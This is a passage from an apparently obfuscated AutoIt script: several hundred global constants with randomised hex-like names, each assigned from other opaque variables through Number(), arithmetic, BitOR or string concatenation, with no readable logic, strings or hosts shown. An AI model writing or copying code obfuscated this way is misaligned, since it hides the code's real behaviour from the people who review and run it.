  391. Global Const $a5234205451 = Number($a0d34303b45)
  392. Global Const $a623440082e = Number($a1f34505c49)
  393. Global Const $a1934600125 = Number($a1534700930)
  394. Global Const $a2d34801655 = Number($a0434902705)
  395. Global Const $a4f34a01b19 = Number($a3f34b05d0f)
  396. Global Const $a4a34c0330a = Number($a5c34d04e00)
  397. Global Const $a3534e03e2e = Number($a4534f0065d)
  398. Global Const $a214400224d = Number($a5444103c50)
  399. Global Const $a1244202b3e = Number($a4a4430404a)
  400. Global Const $a2944403a15 = Number($a0844502a07)
  401. Global Const $a1244600759 = Number($a5544701439)
  402. Global Const $a3544800651 = Number($a2944900c2c)
  403. Global Const $a0f44a03540 = Number($a5444b00911)
  404. Global Const $a0844c00136 = Number($a1a44d0060e)
  405. Global Const $a4044e01624 = Number($a2a44f05c1d)
  406. Global Const $a475400415b = Number($a1454105b07)
  407. Global Const $a0754201226 = Number($a2354306054)
  408. Global Const $a2354405e3a = Number($a5154505b3a)
  409. Global Const $a3054602602 = Number($a1f54701f2b)
  410. Global Const $a3754803b19 = Number($a2f54904230)
  411. Global Const $a2154a03535 = Number($a3854b05846)
  412. Global Const $a5354c02d32 = Number($a5654d03724)
  413. Global Const $a0854e0502c = Number($a3554f04213)
  414. Global Const $a396400152d = Number($a0164101a56)
  415. Global Const $a1764201b48 = Number($a256430120e)
  416. Global Const $a1964403748 = Number($a0c64505741)
  417. Global Const $a006460094e = Number($a3a64704f42)
  418. Global Const $a0e6480500d = Number($a2d64906032)
  419. Global Const $a4664a00910 = Number($a3864b0390e)
  420. Global Const $a1864c02b23 = Number($a5364d06323)
  421. Global Const $a4564e05823 = Number($a0164f0611b)
  422. Global Const $a4674001743 = Number($a5474102026)
  423. Global Const $a2e74206359 = Number($a4c74302526)
  424. Global Const $a2974400a4a = Number($a5f74506329)
  425. Global Const $a4274605118 = Number($a2e74702503)
  426. Global Const $a5674804a3b = Number($a457490104b)
  427. Global Const $a1a74a03549 = Number($a0674b03c2a)
  428. Global Const $a4a74c0241d = Number($a1e74d04c4c)
  429. Global Const $a3474e05d5b = Number($a2674f00417)
  430. Global Const $a208400601f = Number($a2a84100414)
  431. Global Const $a4684202550 = Number($a298430023d)
  432. Global Const $a4884401a42 = Number($a3684500952)
  433. Global Const $a4b84600d51 = Number($a0184702410)
  434. Global Const $a3584800d03 = Number($a4d8490551c)
  435. Global Const $a3b84a03723 = Number($a3e84b0403f)
  436. Global Const $a0c84c00524 = Number($a5c84d02517)
  437. Global Const $a2584e02742 = Number($a4484f00162)
  438. Global Const $a569400023f = Number($a5194103d18)
  439. Global Const $a4e94205436 = Number($a4c94300306)
  440. Global Const $a5094402a50 = Number($a1e9450274a)
  441. Global Const $a3494604010 = Number($a5794700a1d)
  442. Global Const $a3194802d3f = Number($a5294901260)
  443. Global Const $a1894a01649 = Number($a1894b02530)
  444. Global Const $a0e94c0480b = Number($a5194d04d0c)
  445. Global Const $a6294e0580f = Number($a6394f05e4b)
  446. Global Const $a1ea4002f37 = Number($a41a4106003)
  447. Global Const $a38a420400d = Number($a39a4303024)
  448. Global Const $a28a4405601 = Number($a0ba4505051)
  449. Global Const $a09a4605921 = Number($a23a4702a3f)
  450. Global Const $a11a480631b = Number($a0da4901521)
  451. Global Const $a55a4a0331b = Number($a00a4b05928)
  452. Global Const $a2fa4c0273a = Number($a5ba4d05c3b)
  453. Global Const $a42a4e00f17 = Number($a17a4f0043d)
  454. Global Const $a4db4005806 = Number($a44b4102f5a)
  455. Global Const $a07b4200c37 = Number($a4bb4303716)
  456. Global Const $a44b4400707 = Number($a28b4504f2d)
  457. Global Const $a14b460184b = Number($a28b4703308)
  458. Global Const $a04b4801b22 = Number($a0ab4905b17)
  459. Global Const $a40b4a01657 = Number($a03b4b0200d)
  460. Global Const $a0cb4c03811 = Number($a30b4d0034d)
  461. Global Const $a3ab4e05e20 = Number($a16b4f04a12)
  462. Global Const $a55c400611b = Number($a5cc4100113)
  463. Global Const $a2cc420460d = Number($a43c4306045)
  464. Global Const $a42c4405331 = Number($a46c4502025)
  465. Global Const $a22c460222a = Number($a52c4701258)
  466. Global Const $a28c480081c = Number($a54c4901c38)
  467. Global Const $a48c4a06235 = Number($a30c4b02146)
  468. Global Const $a55c4c00639 = Number($a21c4d04125)
  469. Global Const $a00c4e03a51 = Number($a2cc4f01304)
  470. Global Const $a06d4003b02 = Number($a50d410080e)
  471. Global Const $a1fd4203411 = Number($a13d4304239)
  472. Global Const $a3fd440481f = Number($a56d4506253)
  473. Global Const $a54d4606060 = Number($a4cd4703308)
  474. Global Const $a49d4804515 = Number($a1cd4901439)
  475. Global Const $a3cd4a03234 = Number($a1fd4b02b52)
  476. Global Const $a32d4c0033a = Number($a61d4d00960)
  477. Global Const $a50d4e00131 = Number($a0fd4f02c2d)
  478. Global Const $a10e400381e = Number($a3de4100e47)
  479. Global Const $a62e4201428 = Number($a24e430175c)
  480. Global Const $a39e4406360 = Number($a29e450453a)
  481. Global Const $a34e4604430 = Number($a02e470411a)
  482. Global Const $a60e4800109 = Number($a25e4905b46)
  483. Global Const $a4de4a06008 = Number($a61e4b04b2e)
  484. Global Const $a2ee4c04b52 = Number($a5de4d02361)
  485. Global Const $a22e4e05e5b = Number($a14e4f0312d)
  486. Global Const $a0df4001541 = Number($a27f4104658)
  487. Global Const $a5bf4200d41 = Number($a47f4304130)
  488. Global Const $a29f4402121 = Number($a50f450112d)
  489. Global Const $a03f460610b = Number($a2cf4706058)
  490. Global Const $a1af4801f36 = Number($a1bf4904c62)
  491. Global Const $a50f4a05e16 = Number($a08f4b05551)
  492. Global Const $a1bf4c01d4e = Number($a32f4d05b60)
  493. Global Const $a38f4e05d01 = Number($a22f4f02b3a)
  494. Global Const $a1705001e11 = Number($a290510413b)
  495. Global Const $a1805205a3f = Number($a5605303631)
  496. Global Const $a0505400d5d = Number($a410550514a)
  497. Global Const $a4305605b47 = Number($a5a05705e26)
  498. Global Const $a4305804f33 = Number($a5505905408)
  499. Global Const $a3905a0290c = Number($a2d05b04350)
  500. Global Const $a3505c00246 = Number($a2605d0554c)
  501. Global Const $a1305e0490f = Number($a5f05f03d13)
  502. Global Const $a1815000f12 = Number($a5e15100251)
  503. Global Const $a0d15200e59 = Number($a0915301f3c)
  504. Global Const $a0b15403006 = Number($a1a15503828)
  505. Global Const $a3715602907 = Number($a2415702735)
  506. Global Const $a1a1580373c = Number($a1f15903214)
  507. Global Const $a4615a03c53 = Number($a2715b01d06)
  508. Global Const $a6015c0112b = Number($a1b15d03414)
  509. Global Const $a2f15e04d26 = Number($a1f15f03238)
  510. Global Const $a4e25002d26 = Number($a092510634f)
  511. Global Const $a6225205739 = Number($a5825301b2e)
  512. Global Const $a2f2540474a = Number($a4225504806)
  513. Global Const $a2d2560563f = Number($a172570494d)
  514. Global Const $a2925800935 = Number($a5125901031)
  515. Global Const $a5225a02537 = Number($a1a25b02e21)
  516. Global Const $a3425c0381d = Number($a1025d0240d)
  517. Global Const $a5f25e03328 = Number($a4a25f04936)
  518. Global Const $a4d3500481b = Number($a4235106359)
  519. Global Const $a1935200838 = Number($a0c35302a43)
  520. Global Const $a1635400d12 = Number($a5e3550585e)
  521. Global Const $a473560471c = Number($a2535700b4d)
  522. Global Const $a1635800645 = Number($a2b35900756)
  523. Global Const $a1935a02f21 = Number($a1535b05c1d)
  524. Global Const $a1e35c03541 = Number($a4735d02d28)
  525. Global Const $a1835e01b22 = Number($a0935f01a01)
  526. Global Const $a1c45001814 = Number($a3745104b0a)
  527. Global Const $a014520471e = Number($a2b45305a0b)
  528. Global Const $a2f45404c3a = Number($a1d4550404b)
  529. Global Const $a0e45600949 = Number($a4345700939)
  530. Global Const $a5d45802d61 = Number($a474590515b)
  531. Global Const $a3f45a0385a = Number($a0a45b00516)
  532. Global Const $a3845c04800 = Number($a3e45d0285c)
  533. Global Const $a3f45e02756 = Number($a1d45f0573f)
  534. Global Const $a1f55002e62 = Number($a2355100c5c)
  535. Global Const $a4355204c20 = Number($a165530521a)
  536. Global Const $a4755402a0e = Number($a6355500633)
  537. Global Const $a0a55605f18 = Number($a3655704b60)
  538. Global Const $a535580393d = Number($a3255901f63)
  539. Global Const $a3d55a0213a = $a535580393d - Number($a2455b02c43)
  540. Global Const $a1b55c01237 = $a535580393d - Number($a3555d0380e)
  541. Global Const $a0255e0010b = $a535580393d - Number($a3355f02d45)
  542. Global Const $a5365003852 = $a535580393d - Number($a2465102416)
  543. Global Const $a4065204b33 = $a535580393d - Number($a3865305655)
  544. Global Const $a3f6540445a = $a535580393d - Number($a0365505f34)
  545. Global Const $a0165601e27 = $a535580393d - Number($a5f65703153)
  546. Global Const $a2a6580215d = $a535580393d - Number($a3465902b0b)
  547. Global Const $a4665a05a26 = $a535580393d - Number($a1365b0504d)
  548. Global Const $a0665c01f3e = $a535580393d - Number($a0965d03e05)
  549. Global Const $a4c65e03957 = $a535580393d - Number($a1465f05c44)
  550. Global Const $a0e7500153a = $a535580393d - Number($a1075104018)
  551. Global Const $a1f75204849 = $a535580393d - Number($a4c75300849)
  552. Global Const $a0c75401146 = $a535580393d - Number($a2275501501)
  553. Global Const $a2975605e57 = $a535580393d - Number($a4775702f4b)
  554. Global Const $a0975803c50 = $a535580393d - Number($a0c75906252)
  555. Global Const $a1e75a0094d = $a535580393d - Number($a3f75b0600b)
  556. Global Const $a0075c0160d = $a535580393d - Number($a0875d02231)
  557. Global Const $a4a75e05a13 = $a535580393d - Number($a6275f04e16)
  558. Global Const $a5885001b07 = Number($a1b8510224b)
  559. Global Const $a228520015b = Number($a1c85300912)
  560. Global Const $a0c85400224 = Number($a6185505654)
  561. Global Const $a3b85602f08 = Number($a3685702007)
  562. Global Const $a5285803d5d = Number($a2585902732)
  563. Global Const $a5e85a05d51 = Number($a5385b03f09)
  564. Global Const $a2685c0344f = Number($a1b85d02819)
  565. Global Const $a6085e02c54 = Number($a0b85f0602e)
  566. Global Const $a0f95001916 = Number($a2595100262)
  567. Global Const $a3695205823 = Number($a5e95300004)
  568. Global Const $a3795401725 = Number($a629550474d)
  569. Global Const $a1f95604a42 = Number($a0595702805)
  570. Global Const $a4295804f4c = Number($a4f95900a17)
  571. Global Const $a2495a04837 = Number($a5595b05036)
  572. Global Const $a4795c01038 = Number($a1a95d00048)
  573. Global Const $a3095e01c45 = Number($a3795f05018)
  574. Global Const $a07a500151f = Number($a54a5100e54)
  575. Global Const $a37a520154c = Number($a56a530172c)
  576. Global Const $a41a5401d45 = Number($a01a5504d0b)
  577. Global Const $a25a560144e = Number($a1da5701c4a)
  578. Global Const $a5fa5801e0e = Number($a55a5903330)
  579. Global Const $a42a5a02f11 = Number($a35a5b00d01)
  580. Global Const $a34a5c00c3f = Number($a49a5d02637)
  581. Global Const $a61a5e05d3e = Number($a47a5f02053)
  582. Global Const $a37b5004615 = Number($a2cb5102059)
  583. Global Const $a05b5200d4e = Number($a3ab5305b04)
  584. Global Const $a18b5403b4e = Number($a50b5504a21)
  585. Global Const $a16b5604f5f = Number($a29b570353f)
  586. Global Const $a2fb5801855 = Number($a33b5901d01)
  587. Global Const $a2eb5a0631b = Number($a30b5b0555f)
  588. Global Const $a55b5c05948 = Number($a5db5d00943)
  589. Global Const $a53b5e0234b = Number($a35b5f04727)
  590. Global Const $a36c5006228 = Number($a52c5102714)
  591. Global Const $a59c5200236 = Number($a4cc5301817)
  592. Global Const $a54c5404949 = Number($a63c5500911)
  593. Global Const $a15c5604b5b = Number($a3fc5703b15)
  594. Global Const $a0bc5805625 = Number($a40c590225d)
  595. Global Const $a58c5a0473d = ($a0bc5805625 + Number($a17c5b05f3e))
  596. Global Const $a52c5c02e38 = ($a0bc5805625 + Number($a2cc5d03551))
  597. Global Const $a46c5e04e24 = $a0bc5805625 + Number($a2dc5f00d59)
  598. Global Const $a1fd5001124 = $a0bc5805625 + Number($a06d510571d)
  599. Global Const $a39d5204d37 = $a0bc5805625 + Number($a20d5304c1f)
  600. Global Const $a31d5400842 = $a0bc5805625 + Number($a00d5505421)
  601. Global Const $a5ad560112c = $a0bc5805625 + Number($a1ed5701c17)
  602. Global Const $a09d5803b32 = Number($a0cd590110e)
  603. Global Const $a02d5a02e4a = Number($a1cd5b0540a)
  604. Global Const $a25d5c05242 = Number($a26d5d05d01)
  605. Global Const $a18d5e05441 = Number($a53d5f04656)
  606. Global Const $a00e500071c = Number($a5ee5105f5b)
  607. Global Const $a0ce5204c30 = Number($a12e5306106)
  608. Global Const $a12e540422a = Number($a39e5506062)
  609. Global Const $a4de5603b60 = Number($a1ce5704a44)
  610. Global Const $a62e5802610 = Number($a48e5901029)
  611. Global Const $a5fe5a00d38 = Number($a2de5b02460)
  612. Global Const $a55e5c02340 = Number($a48e5d04654)
  613. Global Const $a17e5e02e1f = Number($a46e5f05d10)
  614. Global Const $a49f5003a48 = Number($a43f5102002)
  615. Global Const $a50f5200330 = Number($a1cf530233a)
  616. Global Const $a47f5403b21 = Number($a1bf550340a)
  617. Global Const $a10f5605a5e = Number($a16f570221e)
  618. Global Const $a38f5801030 = Number($a43f5903e4a)
  619. Global Const $a0ef5a02323 = Number($a11f5b02c12)
  620. Global Const $a10f5c03812 = Number($a1cf5d02e2a)
  621. Global Const $a12f5e02016 = Number($a21f5f00820)
  622. Global Const $a1206005f4e = Number($a300610224c)
  623. Global Const $a4a06200060 = Number($a170630295b)
  624. Global Const $a0f06401505 = Number($a4c0650624b)
  625. Global Const $a5406604332 = Number($a450670093a)
  626. Global Const $a2806804810 = Number($a1206903c06)
  627. Global Const $a3e06a02629 = Number($a6106b01d56)
  628. Global Const $a2606c01f21 = Number($a0006d02129)
  629. Global Const $a2406e03b57 = Number($a0c06f05659)
  630. Global Const $a2516002f3b = Number($a3016105c33)
  631. Global Const $a3e16200a27 = Number($a3b16301c19)
  632. Global Const $a6216402b21 = Number($a3b16501a3f)
  633. Global Const $a1016602412 = Number($a0216704662)
  634. Global Const $a4f16803b4a = Number($a3a1690354e)
  635. Global Const $a3d16a05d33 = Number($a0c16b00c51)
  636. Global Const $a3d16c02a2d = Number($a0416d01e23)
  637. Global Const $a1b16e0112a = Number($a2d16f02437)
  638. Global Const $a2526000b48 = Number($a5c2610425a)
  639. Global Const $a072620454d = Number($a4026300f18)
  640. Global Const $a0f2640190c = Number($a072650522d)
  641. Global Const $a5426604804 = Number($a4d2670150b)
  642. Global Const $a2226802957 = Number($a602690205c)
  643. Global Const $a4726a04055 = Number($a3c26b05407)
  644. Global Const $a4926c04235 = Number($a2026d03e62)
  645. Global Const $a5226e03a53 = Number($a2226f0181d)
  646. Global Const $a213600383a = Number($a2736100832)
  647. Global Const $a0e36204456 = Number($a4f36302749)
  648. Global Const $a213640090b = Number($a0b36505e59)
  649. Global Const $a1836601c61 = Number($a4a36705314)
  650. Global Const $a0c36803734 = Number($a5e3690223a)
  651. Global Const $a1736a03406 = Number($a0b36b01e0a)
  652. Global Const $a4e36c06327 = Number($a1336d02338)
  653. Global Const $a3936e05e05 = Number($a5236f01a4a)
  654. Global Const $a044600534a = Number($a5d46101c55)
  655. Global Const $a2f4620480c = Number($a1446304137)
  656. Global Const $a394640540f = Number($a1346500c1e)
  657. Global Const $a1646604436 = Number($a4546703f09)
  658. Global Const $a5146804633 = Number($a5e46900a5a)
  659. Global Const $a2546a06222 = Number($a5546b02210)
  660. Global Const $a4f46c03716 = Number($a3346d02663)
  661. Global Const $a3a46e05b63 = Number($a3c46f00b27)
  662. Global Const $a4b56003a3f = Number($a4d56103f1c)
  663. Global Const $a1e5620602b = Number($a4856301f23)
  664. Global Const $a355640093e = Number($a1256500b21)
  665. Global Const $a2156604233 = Number($a0656701d11)
  666. Global Const $a2f56800609 = Number($a1356905a16)
  667. Global Const $a2e56a06244 = Number($a5056b02b3b)
  668. Global Const $a2f56c00e14 = Number($a4256d03213)
  669. Global Const $a3956e04e3b = Number($a1456f01139)
  670. Global Const $a176600154f = Number($a1e66101741)
  671. Global Const $a1a6620323a = Number($a4866304045)
  672. Global Const $a0e66403d49 = Number($a0c66502a52)
  673. Global Const $a4066605e37 = Number($a3a66701052)
  674. Global Const $a566680045f = Number($a0066903f33)
  675. Global Const $a0366a02c31 = Number($a5666b02206)
  676. Global Const $a1c66c00f4a = Number($a5166d0133f)
  677. Global Const $a6066e02a35 = Number($a3e66f02a1f)
  678. Global Const $a5876005003 = Number($a4e76105001)
  679. Global Const $a5976204727 = Number($a1c76304e1b)
  680. Global Const $a5d7640362a = Number($a4076503640)
  681. Global Const $a4c7660455c = Number($a0776703700)
  682. Global Const $a2e7680202d = Number($a4876903717)
  683. Global Const $a4876a04f61 = Number($a4f76b00810)
  684. Global Const $a2276c03d5b = Number($a5576d03613)
  685. Global Const $a4d76e0244d = Number($a0e76f02a58)
  686. Global Const $a4886002620 = Number($a0386102d5d)
  687. Global Const $a5386204f4d = Number($a3286304831)
  688. Global Const $a5286403d4c = Number($a6086500739)
  689. Global Const $a0586602350 = Number($a1986701e4a)
  690. Global Const $a0b86804c5a = Number($a4b8690422a)
  691. Global Const $a3c86a02807 = Number($a2a86b02162)
  692. Global Const $a5b86c02a38 = Number($a3a86d0150d)
  693. Global Const $a1e86e04118 = Number($a2786f01d59)
  694. Global Const $a0396000b32 = Number($a269610372d)
  695. Global Const $a179620483f = Number($a1b9630053e)
  696. Global Const $a3b96404a10 = Number($a2096505652)
  697. Global Const $a4c96600c2f = Number($a5d9670580b)
  698. Global Const $a3196801652 = Number($a4a96902c31)
  699. Global Const $a5996a05943 = Number($a0196b00136)
  700. Global Const $a3396c04260 = Number($a2296d03532)
  701. Global Const $a2596e01256 = Number($a4b96f0240c)
  702. Global Const $a3ca6005500 = Number($a37a6102602)
  703. Global Const $a19a6204028 = Number($a30a6303324)
  704. Global Const $a0ea6405804 = Number($a57a6503815)
  705. Global Const $a2aa6604228 = Number($a47a6700e1b)
  706. Global Const $a33a6801902 = Number($a37a6900e4c)
  707. Global Const $a36a6a02f1d = Number($a5fa6b05232)
  708. Global Const $a3ba6c0610e = Number($a53a6d0385e)
  709. Global Const $a41a6e00a44 = Number($a42a6f01e5e)
  710. Global Const $a24b6003c45 = Number($a21b6100a2d)
  711. Global Const $a31b6202a5f = Number($a54b630531f)
  712. Global Const $a48b640401b = Number($a2db6501c0d)
  713. Global Const $a33b660032b = Number($a0ab6705f5c)
  714. Global Const $a11b6803e37 = Number($a4db6901c56)
  715. Global Const $a41b6a01e1a = Number($a2fb6b0510b)
  716. Global Const $a10b6c00a2b = Number($a50b6d0202f)
  717. Global Const $a1cb6e01d15 = Number($a1eb6f05f23)
  718. Global Const $a30c6003e31 = Number($a2ec6100e06)
  719. Global Const $a33c6204e5c = Number($a3bc6300e27)
  720. Global Const $a43c640435e = Number($a4ac6503e3b)
  721. Global Const $a20c6603842 = Number($a11c670071d)
  722. Global Const $a2fc680261c = Number($a45c6905f47)
  723. Global Const $a1dc6a0632c = Number($a63c6b01d2b)
  724. Global Const $a4ec6c0610f = Number($a12c6d02b2c)
  725. Global Const $a06c6e0424e = Number($a39c6f05b33)
  726. Global Const $a06d6002d38 = Number($a03d6101332)
  727. Global Const $a58d6200505 = Number($a63d630474c)
  728. Global Const $a04d6405327 = Number($a3fd6503f17)
  729. Global Const $a19d660071c = Number($a0bd670233f)
  730. Global Const $a57d6800939 = Number($a1ed6901b61)
  731. Global Const $a47d6a00004 = Number($a60d6b01e0f)
  732. Global Const $a61d6c0592b = Number($a38d6d04231)
  733. Global Const $a14d6e0020d = Number($a16d6f01162)
  734. Global Const $a40e6002f5c = Number($a0be6101a24)
  735. Global Const $a38e6205132 = Number($a25e6304c35)
  736. Global Const $a0be6406331 = Number($a49e650345c)
  737. Global Const $a2be6601761 = Number($a3ae6701210)
  738. Global Const $a46e6803225 = Number($a23e6901c63)
  739. Global Const $a5ee6a0001c = Number($a33e6b01d42)
  740. Global Const $a63e6c0042a = Number($a3ce6d01d49)
  741. Global Const $a55e6e05f5c = Number($a35e6f01a15)
  742. Global Const $a57f600290a = Number($a57f610244f)
  743. Global Const $a10f6205b0d = Number($a5af630142b)
  744. Global Const $a0af6401330 = Number($a4ff6505424)
  745. Global Const $a43f6604417 = Number($a57f670494c)
  746. Global Const $a4af6803526 = Number($a4df6905636)
  747. Global Const $a1ef6a04505 = Number($a0bf6b0171f)
  748. Global Const $a1bf6c03b5c = Number($a58f6d0180e)
  749. Global Const $a4ef6e03e1e = Number($a1df6f01457)
  750. Global Const $a5b07002e03 = Number($a1607104357)
  751. Global Const $a1a0720525e = Number($a0507301121)
  752. Global Const $a3907402263 = Number($a1b07502d2f)
  753. Global Const $a5407605823 = Number($a2f07702241)
  754. Global Const $a0f0780540f = Number($a3007905057)
  755. Global Const $a2207a00461 = Number($a2a07b0220a)
  756. Global Const $a5307c02738 = Number($a5207d05829)
  757. Global Const $a5107e00145 = Number($a3407f0554d)
  758. Global Const $a5317004f02 = Number($a3517103a0e)
  759. Global Const $a1f17200147 = -Number($a2417300012)
  760. Global Const $a1c1740244f = -Number($a5217504141)
  761. Global Const $a121760552f = Number($a1c17705535)
  762. Global Const $a1417805b00 = Number($a541790020c)
  763. Global Const $a3117a00c18 = Number($a0217b01460)
  764. Global Const $a1917c0544a = Number($a5c17d0300f)
  765. Global Const $a2e17e05c27 = Number($a1017f05c44)
  766. Global Const $a1c27000457 = $a2e17e05c27
  767. Global Const $a5b2710055b = Number($a2627206045)
  768. Global Const $a192730311b = Number($a0b27401618)
  769. Global Const $a5527505f4d = Number($a2827601360)
  770. Global Const $a4b27702c14 = Number($a0527803527)
  771. Global Const $a522790605d = Number($a2127a0182d)
  772. Global Const $a3827b02f5b = Number($a3e27c00915)
  773. Global Const $a4527d05703 = Number($a1e27e04211)
  774. Global Const $a6027f04b3f = Number($a4637003d3a)
  775. Global Const $a173710344d = Number($a343720023b)
  776. Global Const $a3337304e17 = Number($a143740212a)
  777. Global Const $a133750341c = Number($a2d37601e4a)
  778. Global Const $a5937700663 = Number($a0637804f32)
  779. Global Const $a4e37903d63 = Number($a4037a04f4e)
  780. Global Const $a1b37b0473d = Number($a5137c0361a)
  781. Global Const $a6037d00418 = $a4b27702c14
  782. Global Const $a3537e04a63 = $a522790605d
  783. Global Const $a5237f01a46 = $a3827b02f5b
  784. Global Const $a2a47003e25 = $a4e37903d63
  785. Global Const $a1f47100508 = Number($a304720165b)
  786. Global Const $a5d47300503 = Number($a584740615a)
  787. Global Const $a4847501008 = Number($a0847604243)
  788. Global Const $a3a47701d60 = Number($a4d47804418)
  789. Global Const $a2347905126 = Number($a5f47a05921)
  790. Global Const $a4847b03243 = Number($a0447c02e26)
  791. Global Const $a0947d0144e = Number($a0b47e03820)
  792. Global Const $a0a47f06132 = Number($a3f57002c59)
  793. Global Const $a3b57100650 = Number($a1b57206022)
  794. Global Const $a3f57305048 = Number($a075740282f)
  795. Global Const $a3457500e50 = Number($a2757605d44)
  796. Global Const $a0a57702c22 = Number($a0e57802237)
  797. Global Const $a025790532e = Number($a6257a0315f)
  798. Global Const $a4b57b02e4b = Number($a3a57c03612)
  799. Global Const $a6357d02757 = Number($a5357e0123c)
  800. Global Const $a0857f02856 = Number($a2f67001b03)
  801. Global Const $a096710211e = Number($a066720553c)
  802. Global Const $a4467304645 = Number($a0e67405817)
  803. Global Const $a6367504162 = Number($a1e67605030)
  804. Global Const $a6267703f2c = Number($a1267801404)
  805. Global Const $a4c67903732 = Number($a4c67a02c18)
  806. Global Const $a1867b05f2f = Number($a2f67c03359)
  807. Global Const $a0d67d01256 = Number($a1767e01800)
  808. Global Const $a2567f05641 = Number($a5477005a39)
  809. Global Const $a2a7710193e = Number($a297720583f)
  810. Global Const $a4c77303e17 = Number($a4c77402802)
  811. Global Const $a1977503c53 = Number($a2877603e53)
  812. Global Const $a2f77702024 = Number($a3d7780282a)
  813. Global Const $a2e77903704 = Number($a3a77a04c1e)
  814. Global Const $a2477b03857 = Number($a5577c02f4f)
  815. Global Const $a0877d0051d = Number($a2a77e04d14)
  816. Global Const $a5077f05758 = Number($a3587002161)
  817. Global Const $a3087102209 = Number($a618720354e)
  818. Global Const $a4887304545 = Number($a058740193a)
  819. Global Const $a1387501335 = Number($a4387604e41)
  820. Global Const $a5f87701f2f = Number($a498780461d)
  821. Global Const $a008790394b = Number($a3f87a01263)
  822. Global Const $a2787b02c25 = Number($a2587c0000e)
  823. Global Const $a3b87d00d0a = Number($a5e87e01644)
  824. Global Const $a2787f0612e = -Number($a0c9700184d)
  825. Global Const $a2d97100003 = Number($a579720571e)
  826. Global Const $a5f97301e54 = Number($a5c97404c37)
  827. Global Const $a059750384b = Number($a2797603e39)
  828. Global Const $a2b97705a26 = Number($a3f97801851)
  829. Global Const $a3597903f01 = Number($a2497a03605)
  830. Global Const $a3897b0332b = Number($a0797c04250)
  831. Global Const $a1297d0394d = Number($a2297e05a40)
  832. Global Const $a3397f04f4a = Number($a48a700293b)
  833. Global Const $a3fa7103441 = Number($a0aa7200045)
  834. Global Const $a46a7301f35 = Number($a5ba7400910)
  835. Global Const $a11a7500256 = Number($a15a7604d52)
  836. Global Const $a3aa7700436 = Number($a53a7804613)
  837. Global Const $a5ba7900541 = Number($a47a7a04560)
  838. Global Const $a56a7b03800 = Number($a01a7c03822)
  839. Global Const $a24a7d04001 = Number($a3da7e00009)
  840. Global Const $a14a7f04563 = Number($a13b7000830)
  841. Global Const $a46b7103f22 = Number($a56b7203051)
  842. Global Const $a56b7302922 = Number($a06b7402d07)
  843. Global Const $a2fb7501852 = Number($a14b7603d1c)
  844. Global Const $a5bb770523c = Number($a1eb7804932)
  845. Global Const $a49b790592e = Number($a3bb7a01b42)
  846. Global Const $a12b7b03d57 = Number($a1eb7c0575e)
  847. Global Const $a5cb7d04722 = Number($a23b7e02608)
  848. Global Const $a61b7f06230 = Number($a1ec700032a)
  849. Global Const $a2cc7104e13 = Number($a53c7205b0e)
  850. Global Const $a1ec7303419 = Number($a25c7402353)
  851. Global Const $a4ac750103d = Number($a51c7600a43)
  852. Global Const $a2ac7701204 = Number($a3dc7803346)
  853. Global Const $a18c7905d46 = Number($a21c7a04f36)
  854. Global Const $a62c7b03c2a = Number($a10c7c01b54)
  855. Global Const $a58c7d03552 = Number($a01c7e01615)
  856. Global Const $a0ec7f03146 = Number($a5dd7006015)
  857. Global Const $a4ad710320a = Number($a10d720212d)
  858. Global Const $a51d730152d = Number($a11d7401b63)
  859. Global Const $a10d7503e20 = Number($a08d7605d2a)
  860. Global Const $a48d7705534 = Number($a51d7804f52)
  861. Global Const $a21d7903105 = Number($a3ed7a05445)
  862. Global Const $a2bd7b0500a = Number($a3dd7c01247)
  863. Global Const $a0bd7d04d4e = Number($a61d7e05b35)
  864. Global Const $a40d7f01605 = Number($a1be7002861)
  865. Global Const $a2ae710444b = Number($a1ce7205c5d)
  866. Global Const $a34e730474a = Number($a3ae7401231)
  867. Global Const $a4ce7500e33 = Number($a53e7601d15)
  868. Global Const $a5ce7703036 = Number($a01e7805f1a)
  869. Global Const $a18e790430d = Number($a08e7a04a10)
  870. Global Const $a63e7b04e0b = Number($a62e7c04e38)
  871. Global Const $a18e7d03f37 = Number($a0be7e03105)
  872. Global Const $a52e7f03622 = Number($a63f7004d2c)
  873. Global Const $a03f7101a4d = BitOR($a2073c04739, $a3d93005a06, $a54a3405602, $a1483605e2c)
  874. Global Const $a18f720020d = Number($a23f7303101)
  875. Global Const $a2df7400f54 = Number($a1df7505121)
  876. Global Const $a07f7601240 = Number($a0ef770343d)
  877. Global Const $a38f7802d46 = Number($a54f7902a4a)
  878. Global Const $a3ff7a00d4e = Number($a4af7b02746)
  879. Global Const $a49f7c0634f = Number($a3af7d0301b)
  880. Global Const $a5cf7e00a3c = Number($a12f7f06159)
  881. Global Const $a170800321c = Number($a5208105237)
  882. Global Const $a5908202527 = Number($a4d08301f34)
  883. Global Const $a290840285d = Number($a5a08506206)
  884. Global Const $a5008600e55 = Number($a3408704f02)
  885. Global Const $a4308804d34 = Number($a1008905554)
  886. Global Const $a5508a03b3b = Number($a2a08b02331)
  887. Global Const $a2c08c0603b = Number($a4508d06252)
  888. Global Const $a2108e04840 = $a18f720020d + $a3ff7a00d4e
  889. Global Const $a4308f01b42 = $a2df7400f54 + $a3ff7a00d4e
  890. Global Const $a1618002619 = Number($a5d18101648)
  891. Global Const $a2518204004 = Number($a141830600d)
  892. Global Const $a5c18405017 = Number($a3618500824)
  893. Global Const $a591860195a = Number($a5e18703336)
  894. Global Const $a251880370b = Number($a4d18905114)
  895. Global Const $a1c18a00a4e = Number($a3018b00c0d)
  896. Global Const $a3018c01c62 = Number($a4c18d04248)
  897. Global Const $a0118e02601 = Number($a3718f04052)
  898. Global Const $a4728002e14 = Number($a0f28100238)
  899. Global Const $a0b28200b5b = Number($a0a28304621)
  900. Global Const $a6228401d1c = Number($a3f2850031d)
  901. Global Const $a272860463f = Number($a4728700a4a)
  902. Global Const $a5728804811 = Number($a4828905500)
  903. Global Const $a4028a05e3e = Number($a0c28b02b14)
  904. Global Const $a2928c0302e = $a5328d01c5f
  905. Global Const $a2a28e05730 = $a2428f02312
  906. Global Const $a5b3800405b = $a5c38101729
  907. Global Const $a173820555b = $a503830500b
  908. Global Const $a383840554a = $a423850325f
  909. Global Const $a3538605c61 = $a2738702753
  910. Global Const $a6138802415 = $a1038900319
  911. Global Const $a3c38a02206 = $a0f38b05419
  912. Global Const $a5138c00e2e = $a3b38d01829 & $a0738e0380f
  913. Global Const $a3d38f03043 = $a3c38a02206 & $a5148005c5b
  914. Global Const $a3a48100b55 = $a3c38a02206 & $a034820000f
  915. Global Const $a5f48303817 = $a3c38a02206 & $a584840134f & $a0948501e20
  916. Global Const $a3b48604807 = $a464870602b & $a3748802429 & $a2648900825
